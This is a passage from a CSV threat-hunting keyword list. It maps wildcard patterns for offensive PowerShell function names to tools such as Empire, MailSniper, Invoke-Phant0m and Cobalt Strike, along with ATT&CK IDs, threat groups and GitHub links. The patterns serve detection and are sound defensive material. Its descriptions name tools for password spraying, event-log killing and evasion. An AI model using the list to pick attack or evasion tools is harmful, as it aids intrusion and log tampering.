T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1148,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Obfuscation*,offensive_tool_keyword,Invoke-Obfuscation,Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.,T1027 - T1059 - T1140,TA0002 - TA0003 - TA0040,N/A,N/A,Defense Evasion,https://github.com/danielbohannon/Invoke-Obfuscation,1,1,N/A,N/A,10,3289,733,2023-08-10T23:49:06Z,2016-09-25T03:38:02Z -*Invoke-OpenInboxFinder*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-OpenOWAMailboxInBrowser*,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,1,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*Invoke-OxidResolver*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Oxidresolver*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-OxidResolver*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-P0wnedshell*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-P0wnedshellx86*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-PacketKnock*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerBreach.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Paranoia*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-Paranoia.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Paranoia*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1146,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-PasswordSpray*,offensive_tool_keyword,MailSniper,Invoke-PasswordSpray* will attempt to connect to an * portal and perform a password spraying attack using a userlist and a single password.,T1114 T1550 T1555 T1212 T1558 T1110,N/A,N/A,N/A,Exploitation tools,https://github.com/dafthack/MailSniper,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-PasswordSprayEAS*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-PasswordSprayEWS*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-PasswordSprayGmail*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-PasswordSprayOWA*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-PatchDll*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-BypassUAC.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-PatchDll*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-PSInject.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-PatchDll*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Phant0m*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-Phant0m*,offensive_tool_keyword,cobaltstrike,Aggressor script to integrate Phant0m with Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/p292/Phant0m_cobaltstrike,1,1,N/A,10,10,26,13,2017-06-08T06:42:18Z,2017-06-08T06:39:07Z -*Invoke-Phant0m*,offensive_tool_keyword,Invoke-Phant0m,This script walks thread stacks of Event Log Service process (spesific svchost.exe) and identify Event Log Threads to kill Event Log Service Threads. So the system will not be able to collect logs and at the same time the Event Log Service will appear to be running. I have made this script for two reasons. First. This script will help to Red Teams and Penetration Testers. Second. I want to learn Powershell and Low-Level things on Powershell for cyber security field,T1059 - T1086 - T1216,TA0007 - TA0008,N/A,N/A,Defense Evasion,https://github.com/hlldz/Invoke-Phant0m,1,0,N/A,N/A,10,1655,319,2023-09-21T16:08:18Z,2017-05-02T17:19:30Z -*Invoke-Phant0m*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*Invoke-Phant0m.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-Phant0m.ps1*,offensive_tool_keyword,cobaltstrike,Aggressor script to integrate Phant0m with Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/p292/Phant0m_cobaltstrike,1,1,N/A,10,10,26,13,2017-06-08T06:42:18Z,2017-06-08T06:39:07Z -*Invoke-Phant0m.ps1*,offensive_tool_keyword,Phant0m,Windows Event Log Killer,T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/Phant0m,1,1,N/A,N/A,10,1655,319,2023-09-21T16:08:18Z,2017-05-02T17:19:30Z -*invoke-pipekat *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-Piper*,offensive_tool_keyword,invoke-piper,Forward local or remote tcp ports through SMB pipes.,T1003.001 - T1048 - T1021.002 - T1021.001 - T1090,TA0002 -TA0006 - TA0008,N/A,N/A,Lateral movement,https://github.com/p3nt4/Invoke-Piper,1,1,N/A,N/A,3,284,60,2021-03-07T19:07:01Z,2017-08-03T08:06:44Z -*Invoke-PiperClient*,offensive_tool_keyword,invoke-piper,Forward local or remote tcp ports through SMB pipes.,T1003.001 - T1048 - T1021.002 - T1021.001 - T1090,TA0002 -TA0006 - TA0008,N/A,N/A,Lateral movement,https://github.com/p3nt4/Invoke-Piper,1,1,N/A,N/A,3,284,60,2021-03-07T19:07:01Z,2017-08-03T08:06:44Z -*Invoke-PiperServer*,offensive_tool_keyword,invoke-piper,Forward local or remote tcp ports through SMB pipes.,T1003.001 - T1048 - T1021.002 - T1021.001 - T1090,TA0002 -TA0006 - TA0008,N/A,N/A,Lateral movement,https://github.com/p3nt4/Invoke-Piper,1,1,N/A,N/A,3,284,60,2021-03-07T19:07:01Z,2017-08-03T08:06:44Z -*Invoke-PipeShell.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-PortBind*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerBreach.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Portscan*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-PortScan*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,0,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*Invoke-Portscan*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-Portscan.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-PortScan*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-Portscan*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-Portscan.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-Portscan.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - 